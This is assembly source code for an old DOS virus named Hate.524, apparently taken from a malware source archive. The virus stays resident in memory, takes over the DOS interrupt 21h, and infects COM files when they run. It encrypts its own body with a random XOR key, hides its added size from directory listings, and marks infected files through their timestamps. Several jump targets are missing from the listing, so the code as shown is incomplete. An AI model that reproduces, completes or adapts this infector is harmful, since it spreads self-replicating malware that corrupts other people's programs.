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synced 2025-02-11 17:32:03 +00:00
300 lines
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300 lines
9.8 KiB
; Hate.524 (named by Moi because of Internal Text and Size)
; Uninteresting Encrypted COM Infector
; Source code compliments of PakiLad
seg000 segment byte public 'CODE' use16
assume cs:seg000
org 100h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
start proc near
and al, 21h
mov ax, 5800h
int 21h ; Virus Installation Check
cmp ah, 58h ; Installed Already?
jnz InstallVirus ; No? Then JMP.
mov ah, 4Ch
int 21h ; Exit To DOS
call $+3
start endp
Next proc near
pop si
sub si, offset Next
mov dl, Cryptor[si]
cmp dl, 0
jz Crypted
mov cx, VirusSize
lea di, Crypted[si]
mov al, [di]
xor al, dl
mov [di], al
inc di
loop DecryptLoop
mov ah, 14h
int 21h ; Install Check
cmp ah, 6 ; Installed?
jz RestoreCOM ; Yes? Then JMP.
jmp short DoInstall
push cs
pop ds
mov ax, OrgByte1[si]
mov word ptr start, ax
mov ax, OrgByte2[si]
mov word ptr ds:102h, ax
mov al, OrgByte3[si]
mov byte ptr ds:104h, al
mov ax, offset start
push ax
retn ; Return to Original Program
mov ah, 52h
int 21h ; Get List Of Lists
mov bx, es:[bx-2]
mov es, bx
add bx, es:3
inc bx
cmp byte ptr es:0, 'Z' ; Last MCB?
jnz FindLastMCB ; No? Then JMP.
mov ax, es
mov es, bx
cmp byte ptr es:0, 'M' ; More MCB To Follow?
jz GotMoreMCB ; Yes? Then JMP.
mov es, ax ; ES points to MCB
jmp short GotMemory
mov es, bx
add bx, es:3
inc bx
cmp byte ptr es:0, 'M'
jz GotMoreMCB
mov bx, es:3
mov ax, 795
mov cl, 4
shr ax, cl
sub bx, ax
mov es:3, bx
mov ax, es
add bx, ax
xor di, di
mov es, bx
mov cx, TotalSize+100h
push si
rep movsb ; Copy Virus Into Memory
pop si
push es
pop ds
mov ax, 3521h
int 21h ; Get Int 21h Vectors
mov Int21Ofs, bx
mov Int21Seg, es
mov ah, 25h
mov dx, offset NewInt21
int 21h ; Set New Int 21h Vectors
jmp RestoreCOM
Next endp
NewInt21: ; Install Check?
cmp ah, 14h
jnz CheckExecute ; No? Then JMP.
mov ah, 6 ; I'm Here!
CheckExecute: ; Set Execution State?
cmp ah, 4Bh
jnz CheckFCBFind ; No? Then JMP.
jmp short InfectFile
CheckFCBFind: ; Find First File (FCB)?
cmp ah, 11h
jz FindFileFCB ; Yes? Then JMP.
cmp ah, 12h ; Find Next File (FCB)?
jnz DoOriginalFunc ; No? Then JMP.
call CallInt21
push es
cmp al, 0 ; None found?
jnz NoFilesFound ; No? Then JMP.
mov ah, 2Fh
call CallInt21 ; Get DTA Segment/Offset
cmp byte ptr es:[bx], 0FFh ; Extended FCB?
jnz NotExtFCB ; No? Then JMP.
add bx, 7
mov al, es:[bx+17h]
and al, 1Fh
cmp al, 1Fh ; Infected Already?
jnz NoFilesFound ; No? Then JMP.
sub word ptr es:[bx+1Dh], TotalSize ; Fix FileSize
pop es
jmp short $+2
JMPFar21 db 0EAh
Int21Ofs dw 0
Int21Seg dw 0
push es
push ds
mov ax, 3D02h
call CallInt21 ; Open File
jnb FileOpened ; No problems? Then JMP.
jmp CloseFile
xchg ax, bx
push cs
pop ds ; DS = CS
mov ah, 3Fh
mov cx, 5
mov dx, offset OrgByte1
call CallInt21 ; Read In 5 Bytes
mov ax, OrgByte1
add ah, al
cmp ah, 0A7h ; Infected Already?
jnz NotBad1 ; No? Then JMP.
jmp CloseFile
NotBad1: ; Infected Already?
cmp ah, 45h
jnz NoSigFound ; No? Then JMP.
jmp CloseFile
mov ax, 5700h
call CallInt21 ; Get File Date/Time
push cx
push dx
and cx, 1Fh
cmp cx, 1Fh ; Infected Already?
jnz MovePtrEnd ; No? Then JMP.
pop dx
pop cx
jmp short CloseFile
mov ax, 4202h
xor cx, cx
call CallInt21 ; Move Pointer to End of File
sub ax, 3 ; Calculate JMP Offset
mov JMPOffset, ax
mov ah, 40h
mov cx, CryptSize
mov dx, offset start
call CallInt21 ; Write Crypt Routine to File
mov cx, VirusSize
mov si, offset Crypted
mov di, offset EndOfVirus
mov ax, 8F20h
push es
push ax
pop es
assume es:nothing
in al, 40h ; Get Random Number
xchg al, dl
mov Cryptor, dl
mov al, [si]
xor al, dl
mov es:[di], al
inc si
inc di
loop EncryptVirus
mov cx, 1
mov al, [si]
mov es:[di], al
inc si
inc di
loop EncryptSecond
pop es
assume es:nothing
push ds
mov ax, 8F20h
push ax
pop ds
assume ds:nothing
mov ah, 40h
mov cx, VirusSize2
mov dx, offset EndOfVirus
call CallInt21 ; Write Encrypted Virus To File
pop ds
assume ds:seg000
mov ax, 4200h
xor cx, cx
call CallInt21 ; Move Pointer to Beginning
mov ah, 40h
mov cl, 5
mov dx, offset InfMarker
call CallInt21 ; Write JMP And Infection Marker
pop dx
pop cx
or cx, 1Fh
mov ax, 5701h
call CallInt21 ; Fix File Date/Time
mov ah, 3Eh
call CallInt21 ; Close File
pop ds
pop es
jmp near ptr JMPFar21
CallInt21 proc near
call dword ptr cs:Int21Ofs
CallInt21 endp
OrgByte1 dw 2124h
OrgByte2 dw 20CDh
OrgByte3 db 0
InfMarker dw 2124h
JMPInstruction db 0E9h
JMPOffset dw 0
VirusName db 'THIS IS [HATE V1.0] VIRUS$'
Cryptor db 0
CryptSize equ Crypted - start
VirusSize equ Cryptor - Crypted
VirusSize2 equ $ - Crypted
TotalSize equ $ - start
seg000 ends
end start